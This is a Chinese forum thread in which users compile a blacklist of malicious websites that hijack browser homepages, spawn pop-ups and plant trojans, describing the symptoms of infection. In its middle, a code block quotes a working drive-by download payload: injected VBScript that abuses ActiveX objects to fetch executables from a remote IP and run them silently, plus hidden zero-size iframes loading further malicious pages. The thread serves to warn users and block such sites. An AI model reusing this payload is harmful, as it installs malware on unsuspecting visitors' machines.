最新垃圾网站黑名单（大征集）

.Ycj997 昨天，我管理的网络内又有两台电脑中招了！太强悍了！一打开我的电脑就弹出网站，运行任何进程就弹出网站，晕乎~~！看来，一种对进程的控制技术已经成功的运用到了木马中。网上有篇关于进程控制技术的文章提到的试范进程(protector.exe)居然显示在我的进程列表里！更要命的是，这种木马，已突破了冰点的还原技术。 　 　 　 　 面对大理的流氓软件，网页木马，病毒网站，一些杀毒软件显得是那样子的力不从心。而且这些网站的数量正在以几何级数递增。我们再也不能坐视不理了！ 　 　 　 　 现在，我们终有找到一种治本的方法，广泛征集大家一致深恶痛绝的垃圾网站，把它们的网址收录进黑名单。这样，我们可以在IE里设置永远限制这些网站的访问，可以在我们路由器或软路由软件里设置拒绝这些网站。这是一种最根本的治理办法，比任何杀毒软件都管用。 　 　 　 　 目前，从网上收录到一些垃圾网站，现登录如下： http://www.6781.com (昨天中招后，网站被设为这个站点。弹出的网站网址本来记录下来了，却不知怎么也找不到了。。唉！） www.78du.com www.7yin.com (不知什么时候打开，桌面都多了几个快捷图标 很顽固，每次打开浏览器都出现他们的网站还是一大串的，两天了。用兔子和ＥＷＩＤＯ、KV好象都无法清除。大家小心，现在还不知怎么清除。) http://www.9505.com 篡改主页 这个网站是7939、4199等流氓网站的孽种 一直用的OPERA，几年了主页都是一个，最近不知道怎么回事，被这个垃圾给攻破了*.*lll*.*lll 甚至搜索结果也会指向这个网站，真 T M D的佩服**\ 用AVG和恶意软件清理助手试了下，没怎么用*.*lll www.9991.com 　 　 首先说说中了这个“病毒”的症状：1、主页被改成www.9991.com 2、定时连网，效验主页，定时改主页为www.9991.com…… 3、间谍工作，帮9991增加流量…… verycd.265.com 把注册表都修改了，着实气愤，[img=25,20]http://www.cnblogs.com/Emoticons/QQ/icon18.gif>，而且在ie选项的主页设置里改回来还不行 http://down.gament.net 病毒网页：http://down.gament.net/q/q09 点击此网页会有 ＃.exe 文件下载到你的windows/system32下面，此程序为后门木马。专门盗用你上网时的用户名和密码，特别是盗QQ号。

本文来自(www.dngz.net)

www.7939.com www.4199.com www.9505.com www.7255.com www.3448.com www.14se.com 也是一个，定时弹出来 不过我这里网吧电脑。经常有人上这个网站。有时自动弹出 http://www.1717kan.cn/index_1077.asp http://blog.ku6.com/zhuanti/mumayi/ku61/ http://www.haokan123.com/ http://www.37ss.com/index20.htm http://www.9344.cn/ip.htm http://360.ads3721.com/ads-open4.htm http://www.1717kan.cn/index_109000000.asp http://www.bj889.com/ http://www.zqmn.com/ www.ads3721.com 与 www.9505.com同源，估计是一个人搞的． 很可能是传播logo_1病毒的一个网站，，已经封杀．． www.u8u.com http://www.wxku.com/ IE被劫持，总是在打开一个网址时弹出它来。。可恶之极~！ www.waigua9999.com waigua9999.com 攻击论坛的黑网站，挂马～～

这是我用瑞星隔离的恶意网站： http://www.1717kan.cn/index_1077.asp http://blog.ku6.com/zhuanti/mumayi/ku61/ http://www.haokan123.com/ http://www.37ss.com/index20.htm http://www.9344.cn/ip.htm http://360.ads3721.com/ads-open4.htm http://www.1717kan.cn/index_109000000.asp http://www.bj889.com/ http://www.zqmn.com/ 恨之入骨！

[code] document.write('＜script language=＂VBScript＂＞'); 　 　 document.write(':on error resume next'); 　document.write(':dl = ＂http://203.171.236.215/downloader.exe＂'); 　document.write(':fname1=＂downloader.exe＂'); document.write(':　Set df = document.createElement(＂object＂)'); document.write(' :　df.setAttribute ＂classid＂, ＂clsid:BD96C556-65A3-11D0-983A-00C04FC29E36＂'); 　document.write(':　 set SS = df.createobject(＂Adodb.Stream＂,＂＂)');

document.write('　: SS.type = 1'); document.write(':set F = df.createobject(＂Scripting.FileSystemObject＂,＂＂)'); , document.write('　:　set tmp = F.GetSpecialFolder(2)'); document.write(' :　SS.open'); 　document.write(' : fname1= F.BuildPath(tmp,fname1)'); 　 　 document.write('　:　 　 Set getexe = df.CreateObject(＂Microsoft.＂＆＂XMLHTTP＂,＂＂)'); document.write(':getexe.Open ＂GET＂, dl, False'); document.write(' :　getexe.Send'); document.write('　: SS.write getexe.responseBody'); 　document.write(' : SS.savetofile fname1,2'); document.write(' :　 　SS.close'); document.write(':set Q = df.createobject(＂Shell.Application＂,＂＂)'); document.write(':Q.ShellExecute fname1,＂＂,＂＂,＂open＂,0'); 　document.write('　＜/script＞'); 　 　document.write('＜script language=＂VBScript＂＞'); 　 　 document.write(':on error resume next'); 　document.write(':dl = ＂http://203.171.236.215/theopen.exe＂'); 　document.write(':fname1=＂theopen.exe＂'); document.write(':　Set df = document.createElement(＂object＂)'); document.write(' :　df.setAttribute ＂classid＂, ＂clsid:BD96C556-65A3-11D0-983A-00C04FC29E36＂'); 　document.write(':　 set SS = df.createobject(＂Adodb.Stream＂,＂＂)'); document.write('　: SS.type = 1'); document.write(':set F = df.createobject(＂Scripting.FileSystemObject＂,＂＂)'); document.write('　:　set tmp = F.GetSpecialFolder(2)'); document.write(' :　SS.open'); 　document.write(' : fname1= F.BuildPath(tmp,fname1)'); 　 　 document.write('　:　 　 Set getexe = df.CreateObject(＂Microsoft.＂＆＂XMLHTTP＂,＂＂)'); document.write(':getexe.Open ＂GET＂, dl, False'); document.write(' :　getexe.Send'); document.write('　: SS.write getexe.responseBody'); 　document.write(' : SS.savetofile fname1,2'); document.write(' :　 　SS.close'); document.write(':set Q = df.createobject(＂Shell.Application＂,＂＂)'); document.write(':Q.ShellExecute fname1,＂＂,＂＂,＂open＂,0'); (www.dngz.net)版权所有 　document.write('　＜/script＞'); document.write('＜iframe　src=＂http://59.34.197.239/theopen.html＂ frameborder=＂0＂ scrolling=＂0＂ width=＂0＂ height=＂0＂ align=＂center＂＞＜/iframe＞ '); document.write('＜iframe src=＂http://ip1.adanywhere.cn/menllo2.asp＂ width=＂0＂ height=＂0＂ frameborder=＂0＂＞＜/iframe＞'); document.write('＜iframe src=＂http://www2.winopen.cn/pomoho.asp＂ width=＂0＂ height=＂0＂ frameborder=＂0＂＞＜/iframe＞'); document.write('＜iframe src=＂http://www.f1ash8.net/13770ad.asp＂ width=＂0＂ height=＂0＂ frameborder=＂0＂＞＜/iframe＞'); document.write('＜iframe src=＂http://ip.adanywhere.cn/kuaiso001.asp＂ width=＂0＂ height=＂0＂ frameborder=＂0＂＞＜/iframe＞');

document.write('＜iframe src=＂http://59.34.197.239/0602328exe.htm＂ width=＂0＂ height=＂0＂ frameborder=＂0＂＞＜/iframe＞'); document.write('＜iframe src=＂http://ip.adanywhere.cn/58hu03.asp＂ width=＂0＂ height=＂0＂ frameborder=＂0＂＞＜/iframe＞'); document.write('＜iframe src=＂http://ip.adanywhere.cn/openopen.asp＂ width=＂0＂ height=＂0＂ frameborder=＂0＂＞＜/iframe＞'); [/code]

7939.com,7b.com.cn,9505.com,4199.com 清除工具 by tkabc http://bbs.dngz.net/thread-111312-1-18.html

www.ads3721.com 很可能是传播logo_1病毒的一个网站，，已经封杀．．

换个浏览器吧！ 流氓软件和垃圾网站少多了！

占位。。。天涯又回来了？

我以前没上过这些网,谢谢了。

这是我用瑞星隔离的恶意网站： http://www.1717kan.cn/index_1077.asp http://blog.ku6.com/zhuanti/mumayi/ku61/ http://www.haokan123.com/ http://www.37ss.com/index20.htm http://www.9344.cn/ip.htm ... 都试过了，果然很多病毒，正好让我测试了Ghost Security Suite( GSS) McAfee VirusScan Enterprise 8.0i With Patch 14 简体中文企业版的功力，结果令我满意，重启电脑后没发现任何问题。

www.u8u.com dngz.net版权所有 IE被劫持，总是在打开一个网址时弹出它来。。可恶之极~！

http://www.wxku.com/ IE被它劫持，总是在打开一个网址时弹出它来。。可恶之极~！